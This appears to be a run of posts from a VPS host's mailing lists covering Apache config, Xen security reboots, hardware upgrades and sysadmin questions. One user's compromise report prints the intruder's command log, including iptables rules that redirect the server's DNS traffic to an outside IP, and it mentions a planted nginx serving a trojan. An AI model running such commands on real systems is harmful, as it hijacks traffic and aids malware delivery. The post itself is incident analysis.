The combination of Wheezy's PHP 5.4 reaching end of life and the
hack means I have been looking at setting up a new Jessie server.
The release notes for Jessie acknowledge that "We do not allow access
to the file system outside /var/www and /usr/share. If you are running
virtual hosts or scripts outside these directories, you need to
whitelist them in your configuration to grant access through HTTP."
Now, I have had virtual hosts in users' directories,
/home/*/public_html, so that's me. And...
"You must allow access to your served directory explicity in the
corresponding virtual host, or by allowing access in apache2.conf as
proposed."
I think I have, in both, but everything is still getting served by the
default server. (As opposed to getting permission denied.)
In /etc/apache2/apache2.conf:
<Directory /home/username/public_html/>
Options FollowSymLinks
AllowOverride None
Require all granted
</Directory>
In /etc/apache2/sites-enabled (symlinked from sites-available):
<VirtualHost *>
DocumentRoot "/home/username/public_html/test"
ServerName example.co.uk
ServerAlias *.example.co.uk
ErrorLog /home/username/logs/test.example.co.uk.error.log
LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-agent}i\" %T" commontime
CustomLog /home/username/logs/test.example.co.uk.access.log commontime
<Directory "/home/username/public_html/test">
Options FollowSymLinks
Require all granted
</Directory>
</VirtualHost>
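For what it's worth, one way to sanity-check what Apache thinks its
virtual host layout is would be something like this (a sketch,
assuming Debian's apache2ctl wrapper is available):

# Dump the parsed vhost configuration; the default server for each
# address:port pair is listed first.
apache2ctl -S
# Check the syntax after edits, then reload:
apache2ctl configtest
service apache2 reload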
What stupid thing am I (not) doing?
Ian
Hi,
There's a serious security bug in the Xen hypervisor currently under
embargo until 29th October.
The following of BitFolk's hosts are affected:
bellini.bitfolk.com
dunkel.bitfolk.com
president.bitfolk.com
snaps.bitfolk.com
sol.bitfolk.com
Some time before the 29th these hosts are going to require their
hypervisors to be upgraded and that upgrade will require the host to
be rebooted, so all VPSes on those hosts will also be shut down and
booted again.
I've not yet fixed exactly when this will be done. Most likely in
the early hours of the morning UK time across three nights close to
the end of the embargo.
To complicate matters further, as you're probably aware, we're
currently in the middle of migrating customers to new hardware and
upgrading them in the process:
https://tools.bitfolk.com/wiki/Hardware_refresh,_2015-2016
http://lists.bitfolk.com/lurker/message/20150927.060438.69cadb3d.en.html
One new host, snaps, has already been deployed and is now at full
capacity, so I'm in the process of deploying the next one. That
means the next one can be patched before customers are put on it,
and so the next batch of upgrades will side-step the need for this
extra reboot.
So, if:
- You've already been contacted about migrating+upgrading your VPS
but you have so far chosen not to respond, and
- Your VPS is on one of the above listed hosts
then you may wish to consider going back to that email and agreeing
to the migration+upgrade as soon as possible, as otherwise you are
most likely going to experience some down time for the security
patch and ALSO some down time for your eventual forced
migration+upgrade.
I'll follow up as soon as I can with dates/times the patching and
reboots will take place.
Cheers,
Andy
--
http://bitfolk.com/ -- No-nonsense VPS hosting
_______________________________________________
announce mailing list
announce(a)lists.bitfolk.com
https://lists.bitfolk.com/mailman/listinfo/announce
Earlier this month, a Greek IP address failed to log in to five WordPress
sites on two of my servers - not on BitFolk. One attempt each on four
sites, and seven on another, spread over several days.
On Tuesday last week, it was blocked for 24 hours by both of them after
five failed attempts to log in via ssh.
On Wednesday, it succeeded on one of them. Given the strength of the
password, the fact that it's not used (by me) anywhere else, and the
slim chance of guessing it at random, I would quite like to know *how*.
I did log in over ssh that day via my mobile, but there is no sign that
my phone is compromised - I logged into three other servers that day,
and none of them have seen this happen. Similarly, if my PC had an
issue, I would expect the other servers to be affected.
I would be wondering about the other people who know the password
for this one, except that if whoever was behind that IP address knew
the password, why did they fail the previous day?
Two other 'not me' IP addresses have also since managed it, most
recently on Sunday.
What I can see that they did was firstly...
netstat -napu
cat /etc/resolv.conf
cat /etc/bind/named.conf.default-zones
ifconfig
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to-destination 176.9.74.8:10054
iptables -t nat -A POSTROUTING -p udp -j MASQUERADE
iptables -t nat -L -v -n
iptables -t nat -L -v -n
ifconfig
iptables -L -v -n -x
iptables -I OUTPUT -p udp --sport 53 -j ACCEPT
iptables -I OUTPUT -p udp --dport 53 -j ACCEPT
iptables -L -v -n -x
exit
netstat -napu
exit
... which, if I understand it correctly, is redirecting DNS requests to
that IP address (various sites reckon that's a site in Germany,
chipmanuals.com, apparently owned by someone in Tbilisi, Georgia...)
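For anyone who finds the same rules on their own box, a sketch of
undoing that redirect (assuming there are no other NAT rules you
want to keep):

# Stop forwarding and flush the injected NAT rules.
echo 0 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -F PREROUTING
iptables -t nat -F POSTROUTING
# Verify nothing is left:
iptables -t nat -L -v -n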
Secondly, on Sunday various files were placed in /tmp/.estbuild
including a copy of nginx.
This seems to have been serving a version of the Dridex trojan in the
form of a Windows .exe file from (domain name)/uniq/* before passing the
request on to Apache to 404 the /uniq/ URLs. Fortunately, because of how
it was set up, only requests to the server's own domain name were
affected and it looks like that only had about three human visitors in
that time, one of whom complained.
Obviously more could have happened - there's nothing else odd in various
log files, but clearly they cannot be completely trusted.
On the plus side, this was the server that was first in my queue to
replace with one running Debian Jessie, and it has been ten years since
anything like this has happened to me,* but grrr...
Ian
* The person who ended up being the boss of a former workplace opened an
executable attachment in an email both 'to' and 'from' them that they
knew they hadn't sent, but they "wanted to know what it was..."
I am on kwak. Just rebooted. After rebooting, system time was
about two hours in the future, until:
Oct 14 15:34:44 <myhost> ntpdate[461]: step time server 131.211.8.244 offset -7049.893933 sec
Is the initial time picked up off the host?
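For reference, the offset can be checked by hand after a boot with
something like this (a sketch, assuming ntpdate is installed; any
reachable NTP server would do in place of that IP):

# -q queries and prints the offset without stepping the clock.
ntpdate -q 131.211.8.244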
Hi,
I haven't done a security incident posting in a while, but that is
down to me forgetting to do them rather than any lack of them!
On 2nd October a customer's compromised WordPress install was used
to attempt brute-force logins on another remote site's WordPress.
This drew an abuse report which is how the original compromise was
discovered.
It's not known at this stage how the customer's WordPress was
compromised. The site has been disabled.
Cheers,
Andy
About this email:
https://tools.bitfolk.com/wiki/Security_incident_postings
--
http://bitfolk.com/ -- No-nonsense VPS hosting
Hello all.
Just a quick query really. Is it possible to boot Clonezilla or similar
on the VPS via the Xen interface? It's not something I know much about,
but I wanted a complete and definite way of backing up. I can put the
image data to another server somewhere and write to HDD as a complete
offsite backup.
Clonezilla comes as an ISO, which with Grub2 can be booted, but I don't
really want to mess around with Grub too much in case I break it.
If there is a better solution to create a complete bit-level backup,
fire away.
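The sort of fallback I had in mind is a straight dd over SSH (a
sketch; it assumes the disk appears as /dev/xvda, "user@backuphost"
stands in for wherever the image should go, and it's best done with
the filesystem unmounted or the VPS shut down):

# Read the whole block device, compress it, and stream it offsite.
dd if=/dev/xvda bs=1M | gzip | ssh user@backuphost 'cat > vps-backup.img.gz'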
Thanks in advance.
George, M1GEO.
george-smart.co.uk
Hello,
TL;DR:
This email is purely informational and there's no need for you to
take any action as a result of it.
The base VPS memory will go from 480M to 1,024M soon, and the
incremental upgrade will go from 240M to 256M, with the prices
remaining the same for those line items. It will take some time
(months) for this to be phased in. You don't need to do anything at
present.
Not Long Enough, Give Me More Info To Read:
Ideally I wanted to avoid saying anything about this until it had
started affecting customers, but I'd already given some time
estimates to a few people ("somewhere around the first week of
July"). Now there's been a few delays and some would be left
wondering what is going on, so I thought I better say something.
Clearly an upgrade of VPS specs has been well overdue for ages. In
June, hardware orders were made and this process is now under way.
It's not quite as simple as just buying "the same, but new". The
current BitFolk customer base is spread across 9 servers, and every
single one of them is basically not upgradeable at this stage. I
don't really want to replace them with 9 new ones, so a little more
scalability is required.
The bottleneck at present is either IOPS or CPU. IOPS is the harder
one to solve, so to increase scalability the new hardware must be
SSD-only. That's obviously really expensive, so this is not
something I want to get wrong.
There was quite a long lead time on the hardware I'd selected. I
felt it was worth the wait because the motherboard and CPU have a
really good bang per Watt factor, and the predominant cost for
BitFolk is power. That's now arrived, is in colo, and is being
worked on, so hopefully it won't be as much of an issue in future.
The delaying issue now is software. There's a bunch of changes in
both Debian¹ and Xen² which I need to account for in BitFolk's own
software infrastructure.
Once that's progressed a bit more I will need to start putting
BitFolk's own infrastructure VMs on the new hardware to give things
a bit more of a soak test³. Around that time I will also be talking
to those I have already spoken to about this—and seeking some more
volunteers—to have their VPSes moved to the new hardware. There's
no need to contact me now to volunteer. I have to select the most
suitable customers for this and then ask them.
A key thing I need to discover is when the CPU and IOPS will run
out for this specification. For that reason the initial candidates
will have only the base amount of RAM (1G), so that the maximum
number of them can be packed on, and only the base amount of storage
(10G), again so hopefully that doesn't run out before another limit
is reached.
For some sense of comparison, the 3 busiest current servers look
something like this:
Name | # VPSes | RAM used | Storage used
----------+---------+----------+-------------
bellini | 74 | 47G | 2.71T
president | 60 | 45G | 2.71T
sol | 50 | 47G | 1.69T
The new hardware has 1.6T of usable SSD per box, and I want to fit
more customers on each, so obviously I have to start with low
storage VPSes first if I don't want storage to run out first.
Obviously SSD storage costs vastly more than HDD storage. Not very
many BitFolk customers order more storage, but it is unclear at this
stage if I can continue to offer additional (SSD-backed) storage for
the same price as the current HDD-backed storage. I do not want to
put both HDDs and SSDs into the same hosts, so I want to avoid
selling a mixture. I will know more once I've found out where the
CPU and IOPS limits lie.
The backup storage that is currently sold at the same price as live
storage is going to remain on HDD and so will remain at the same
price as now (or cheaper), whatever the case.
Even after I am satisfied that the setup is working well, and the
limits have been found, still I can't just move absolutely anyone in
any order. The next priority will be to decommission the most
power-hungry hosts. By this stage I will be continually ordering and
commissioning new hardware and then migrating customers to it.
During this time, as hosts are emptied, it will be possible to
increase the RAM of some customers without moving them. Eventually
however it will be necessary for every customer to have their VPS
moved between hosts, because the existing hardware is probably around
3 to 4 times as power-hungry as the new hardware, which should
support more customers per box.
So, there is no need for you to take any action at this time, other
than to ask any questions you may have. I will be in touch with you
directly once it is time for anything to happen. I just wanted to
let you know what was going on, and to reassure those who I've
already spoken to that I have not forgotten about this! The first
set of hardware is bought already, the money is spent, and having
both new and older hardware live is costing BitFolk even more money,
so it is definitely going ahead. :)
Cheers,
Andy
¹ Debian jessie comes with systemd. I have to make sure I'm
comfortable with this and that various other bits of software are
integrated.
I use Puppet for config management. Debian jessie comes with a
version of puppet client which will not talk to the puppetmaster
that is packaged with Debian wheezy. Upgrading the puppetmaster
may necessitate wide-ranging changes elsewhere.
As an aside, forced upgrades like this are probably in my top 5
annoyances with Puppet, and I probably wouldn't choose it for a new
deployment. So I don't need to hear about your Puppet hate. :)
² The major piece of work here is accounting for the removal of
Python code from Xen (guest) config files.
At the moment each VPS has a config file which is actually a
fragment of Python that only has variables in it, with a call to a
Python script at the bottom. That script decides whether to just
boot your VPS, or in fact to boot the rescue VM or to download an
installer kernel/initramfs and boot that.
The ability to do that has now gone away and a guest config file
is now just a set of key/value pairs. This means that the Xen
Shell will need to write a new config file for each command or
change you make, and boot that one.
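To illustrate, an old-style guest config looks something like this
(the names and paths here are made up for the example):

# Old style (xm): the file is evaluated as Python, so after the
# variables it can hand over to a script that decides what to boot.
name   = 'examplevps'
memory = 1024
disk   = ['phy:/dev/vg/examplevps,xvda,w']
execfile('/etc/xen/scripts/decide-boot.py')

# New style (xl): plain key/value pairs only, so the execfile()
# trick is gone and a fresh config has to be written out per boot.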
³ Obviously it's already been punished with memtest86+ and IO
throughput tests. I mean more operational testing.
--
http://bitfolk.com/ -- No-nonsense VPS hosting
Hi All,
Maybe it is me that has missed something (as usual), but I seem to be
getting some strange behaviour at (in? on? with?) the VPS console. I
can log in as usual, and screen starts up a shell on my VPS. But
if I detach the screen process from the console (with Ctrl-a d for
example), I am immediately logged out. At that stage I expected to get
to the xen shell so I could control the state of my vps. But that does
not happen.
Anyone got any ideas as to why this is happening?
Thanks,
__
/ony
Following the recent upgrade and reboot of my BitFolk server, OpenVPN
had stopped working. (I don't use it very often on that server; hence I
hadn't noticed.)
After some trying, the issue turned out to be that the server had
stopped functioning as a router - I thought I'd share what I did to make
it work, in case others run into the same problem.
I ran
echo 1 > /proc/sys/net/ipv4/ip_forward
modprobe tun
iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o eth0 -j MASQUERADE
/etc/init.d/openvpn restart
Not sure if all of these were needed - the iptables one definitely
was, as that was the one that fixed it.
Is there an easy way to make these changes permanent so that they will
survive a future reboot?
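In case it's useful to anyone else, the approach I'm considering is
something like this (a sketch, assuming Debian and the
iptables-persistent package; adjust paths and rules to taste):

# Persist the sysctl across reboots:
echo 'net.ipv4.ip_forward=1' > /etc/sysctl.d/99-forwarding.conf
# Load the tun module at boot:
echo 'tun' >> /etc/modules
# Save the current iptables rules so they're restored at boot:
apt-get install iptables-persistent
iptables-save > /etc/iptables/rules.v4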
Thanks
Martijn.
Hi all,
Hoping to crowdsource your knowledge.
In Ubuntu/Debian, is it possible to set up the www-data user with SSH
access (for development purposes; read/write to the web server document
root) but not "shell access" otherwise?
SSH access will be pub-key only; I already know how to set that up,
so there's no need for the obvious "make it key-only" suggestions.
Kind regards
Murray Crane